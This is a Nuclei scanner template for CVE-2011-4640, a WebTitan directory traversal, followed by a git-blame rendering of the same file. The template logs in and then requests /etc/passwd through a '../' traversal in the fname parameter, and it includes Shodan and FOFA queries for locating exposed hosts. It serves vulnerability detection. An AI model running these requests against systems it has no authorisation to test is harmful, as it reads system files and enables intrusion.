nuclei-templates/http/cves/2011/CVE-2011-4640.yaml

id: CVE-2011-4640

info:
  name: WebTitan < 3.60 - Local File Inclusion
  author: ctflearner
  severity: medium
  description: |
    Directory traversal vulnerability in logs-x.php in SpamTitan WebTitan before 3.60 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the fname parameter in a view action.
  reference:
    - https://www.exploit-db.com/exploits/37943
    - https://nvd.nist.gov/vuln/detail/CVE-2011-4640
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:N/A:N
    cvss-score: 4
    cve-id: CVE-2011-4640
    cwe-id: CWE-22
    epss-score: 0.05544
    epss-percentile: 0.93225
    cpe: cpe:2.3:a:spamtitan:webtitan:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: spamtitan
    product: webtitan
    shodan-query:
      - title:"WebTitan"
      - http.favicon.hash:1090061843
    fofa-query:
      - icon_hash=1090061843
      - title="webtitan"
  tags: cve,cve2011,lfi,spamtitan,webtitan,authenticated

http:
  - raw:
      - |
        GET /login-x.php HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /login-x.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        X-Requested-With: XMLHttpRequest

        jaction=login&language=en_US&username={{username}}&password={{password}}

      - |
        GET /logs-x.php?jaction=view&fname=../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "success\":true")'
          - 'contains(body_1, "WebTitan")'
          - "regex('root:.*:0:0:', body)"
          - 'status_code_3 == 200'
        condition: and
# digest: 4a0a00473045022041d30c6c44480e0b6452ec13d45a918b1c58535eca3e62f6d421984463f22f6f022100972d7303e93712725ab70fa65837727b8aa45f4fc20ec041f4a33ac4e65cc228:922c64590222798bb761d5b6d8e72950
Create CVE-2011-4640.yaml 2023-10-06 06:06:38 +00:00			`id: CVE-2011-4640`

			`info:`
added login req and fix template 2024-02-05 05:49:39 +00:00			`name: WebTitan < 3.60 - Local File Inclusion`
Create CVE-2011-4640.yaml 2023-10-06 06:06:38 +00:00			`author: ctflearner`
			`severity: medium`
Update CVE-2011-4640.yaml 2023-10-08 07:35:56 +00:00			`description: \|`
			`Directory traversal vulnerability in logs-x.php in SpamTitan WebTitan before 3.60 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the fname parameter in a view action.`
Create CVE-2011-4640.yaml 2023-10-06 06:06:38 +00:00			`reference:`
			`- https://www.exploit-db.com/exploits/37943`
added login req and fix template 2024-02-05 05:49:39 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2011-4640`
Create CVE-2011-4640.yaml 2023-10-06 06:06:38 +00:00			`classification:`
Update CVE-2011-4640.yaml 2023-10-08 07:35:56 +00:00			`cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:N/A:N`
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot: 2024-03-23 09:28:19 +00:00			`cvss-score: 4`
Create CVE-2011-4640.yaml 2023-10-06 06:06:38 +00:00			`cve-id: CVE-2011-4640`
			`cwe-id: CWE-22`
product/queries updated 2024-05-31 19:23:20 +00:00			`epss-score: 0.05544`
			`epss-percentile: 0.93225`
			`cpe: cpe:2.3:a:spamtitan:webtitan::::::::`
added login req and fix template 2024-02-05 05:49:39 +00:00			`metadata:`
			`max-request: 3`
Update CVE-2011-4640.yaml 2024-03-27 22:08:12 +00:00			`vendor: spamtitan`
product/queries updated 2024-05-31 19:23:20 +00:00			`product: webtitan`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`shodan-query:`
			`- title:"WebTitan"`
			`- http.favicon.hash:1090061843`
			`fofa-query:`
			`- icon_hash=1090061843`
			`- title="webtitan"`
added login req and fix template 2024-02-05 05:49:39 +00:00			`tags: cve,cve2011,lfi,spamtitan,webtitan,authenticated`
Create CVE-2011-4640.yaml 2023-10-06 06:06:38 +00:00
			`http:`
added login req and fix template 2024-02-05 05:49:39 +00:00			`- raw:`
			`- \|`
			`GET /login-x.php HTTP/1.1`
			`Host: {{Hostname}}`
Update CVE-2011-4640.yaml 2023-10-08 07:35:56 +00:00
added login req and fix template 2024-02-05 05:49:39 +00:00			`- \|`
			`POST /login-x.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`
			`X-Requested-With: XMLHttpRequest`
Create CVE-2011-4640.yaml 2023-10-06 06:06:38 +00:00
added username and password variables 2024-02-05 05:52:31 +00:00			`jaction=login&language=en_US&username={{username}}&password={{password}}`
added login req and fix template 2024-02-05 05:49:39 +00:00
			`- \|`
			`GET /logs-x.php?jaction=view&fname=../../../../../etc/passwd HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'contains(body_2, "success\":true")'`
			`- 'contains(body_1, "WebTitan")'`
			`- "regex('root:.*:0:0:', body)"`
			`- 'status_code_3 == 200'`
			`condition: and`
Auto Template Signing [Sat Jun 1 06:52:59 UTC 2024] :robot: 2024-06-01 06:53:00 +00:00			`# digest: 4a0a00473045022041d30c6c44480e0b6452ec13d45a918b1c58535eca3e62f6d421984463f22f6f022100972d7303e93712725ab70fa65837727b8aa45f4fc20ec041f4a33ac4e65cc228:922c64590222798bb761d5b6d8e72950`